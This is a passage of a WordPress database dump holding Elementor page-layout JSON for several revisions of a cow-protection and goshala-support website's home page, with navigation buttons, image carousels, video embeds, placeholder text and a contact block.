"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9953,1668,'_elementor_page_assets','a:0:{}'),(9955,1669,'_elementor_edit_mode','builder'),(9956,1669,'_elementor_template_type','wp-page'),(9957,1669,'_elementor_version','3.7.8'),(9958,1669,'_wp_page_template','elementor_canvas'),(9959,1669,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_single\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1654,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\"},{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1628,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-1234.png\"}],\"background_repeat\":\"no-repeat\",\"background_slideshow_slide_duration\":2000,\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"21\",\"right\":\"0\",\"bottom\":\"192\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9960,1669,'_elementor_page_assets','a:0:{}'),(9962,1670,'_elementor_edit_mode','builder'),(9963,1670,'_elementor_template_type','wp-page'),(9964,1670,'_elementor_version','3.7.8'),(9965,1670,'_wp_page_template','elementor_canvas'),(9966,1670,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_single\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About 